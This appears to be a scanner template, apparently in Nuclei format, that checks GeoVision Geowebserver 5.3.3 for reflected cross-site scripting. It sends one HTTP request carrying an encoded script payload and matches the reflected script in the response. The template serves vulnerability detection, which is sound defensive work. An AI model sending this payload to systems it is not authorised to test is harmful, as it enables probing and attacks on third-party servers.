id: geowebserver-xss

info:
  name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
  author: madrobot
  severity: high
  description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
  reference:
    - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: geowebserver,xss,packetstorm

http:
  - raw:
      - |
        GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html

# digest: 490a00463044022025d8e748d531bc0ad2980d78ab4449567d8b3e3160eba61cf84ed8ddbbe6e29402203230fdb94d1e407d979e7bedfb00b0db19a9e2300c0574ceba0ce48d498e0831:922c64590222798bb761d5b6d8e72950
